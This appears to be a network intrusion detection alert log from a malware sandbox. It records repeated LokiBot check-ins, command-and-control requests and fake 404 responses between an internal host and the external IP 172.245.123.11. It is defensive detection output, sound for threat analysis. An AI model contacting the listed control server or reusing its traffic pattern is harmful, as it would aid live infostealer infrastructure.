2025-01-07T11:02:04.247901+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.772127+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.772127+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.776954+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49717	TCP
2025-01-07T11:02:04.955089+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:04.955089+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:04.955089+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.483094+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.483094+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.483351+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49718	TCP
2025-01-07T11:02:05.693265+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:05.693265+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:05.693265+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.191450+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.191450+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.199216+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49719	TCP
2025-01-07T11:02:06.454475+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:06.454475+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:06.454475+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:06.944182+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:06.944182+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:06.949892+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49720	TCP
2025-01-07T11:02:07.167908+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.167908+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.167908+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.693898+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.693898+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.698697+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49721	TCP
2025-01-07T11:02:07.855998+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:07.855998+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:07.855998+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.371774+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.371774+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.376604+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49722	TCP
2025-01-07T11:02:08.543768+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:08.543768+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:08.543768+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.043689+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.043689+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.048487+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49723	TCP
2025-01-07T11:02:09.203966+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.203966+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.203966+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.690323+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.690323+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.690347+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49724	TCP
2025-01-07T11:02:09.860003+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:09.860003+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:09.860003+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.371491+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.371491+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.376291+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49725	TCP
2025-01-07T11:02:10.546688+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:10.546688+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:10.546688+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.080195+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.080195+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.080304+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49727	TCP
2025-01-07T11:02:11.233719+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.233719+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.233719+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.739564+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.739564+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.744334+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49730	TCP
2025-01-07T11:02:11.958150+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:11.958150+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:11.958150+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.466482+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.466482+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.471383+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49732	TCP
2025-01-07T11:02:12.617821+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:12.617821+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:12.617821+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.113940+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.113940+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.119052+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49734	TCP
2025-01-07T11:02:13.258855+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.258855+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.258855+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.753938+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.753938+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.758672+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49736	TCP
2025-01-07T11:02:13.915720+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:13.915720+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:13.915720+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.420666+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.420666+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.425478+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49738	TCP
2025-01-07T11:02:14.575614+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:14.575614+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:14.575614+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.079219+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.079219+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.088894+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49739	TCP
2025-01-07T11:02:15.241631+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.241631+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.241631+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.751764+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.751764+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.752303+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49740	TCP
2025-01-07T11:02:15.898264+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:15.898264+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:15.898264+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.407319+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.407319+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.412071+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49741	TCP
2025-01-07T11:02:16.561248+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:16.561248+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:16.561248+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.070038+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.070038+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.074803+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49742	TCP
2025-01-07T11:02:17.278413+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.278413+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.278413+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.794738+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.794738+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.799464+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49748	TCP
2025-01-07T11:02:17.961173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:17.961173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:17.961173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.478664+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.478664+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.483475+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49754	TCP
2025-01-07T11:02:18.640081+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:18.640081+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:18.640081+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.157102+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.157102+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.162697+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49760	TCP
2025-01-07T11:02:19.327075+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:19.327075+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:19.327075+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:19.851955+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:19.851955+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:19.856728+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49766	TCP
2025-01-07T11:02:20.043059+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.043059+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.043059+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.564861+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.564861+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.569615+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49772	TCP
2025-01-07T11:02:20.742103+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:20.742103+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:20.742103+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.267286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.267286+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.272044+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49778	TCP
2025-01-07T11:02:21.431219+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:21.431219+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:21.431219+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:21.949590+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:21.949590+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:21.954458+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49784	TCP
2025-01-07T11:02:22.122622+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.122622+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.122622+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.615903+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.615903+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.616022+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49790	TCP
2025-01-07T11:02:22.801706+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:22.801706+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:22.801706+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.331353+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.331353+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.331357+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49795	TCP
2025-01-07T11:02:23.524470+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:23.524470+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:23.524470+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.058134+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.058134+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.064050+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49801	TCP
2025-01-07T11:02:24.248034+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.248034+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.248034+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.758689+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.758689+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.766691+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49804	TCP
2025-01-07T11:02:24.981285+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:24.981285+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:24.981285+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.495647+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.495647+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.495830+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49810	TCP
2025-01-07T11:02:25.670616+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:25.670616+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:25.670616+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.182014+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.182014+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.182034+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49815	TCP
2025-01-07T11:02:26.424356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:26.424356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:26.424356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:26.935612+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:26.935612+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:26.940462+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49821	TCP
2025-01-07T11:02:27.144150+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.144150+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.144150+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.636276+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.636276+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.641073+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	49828	TCP
2025-01-07T11:02:27.947960+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49834	172.245.123.11	80	TCP
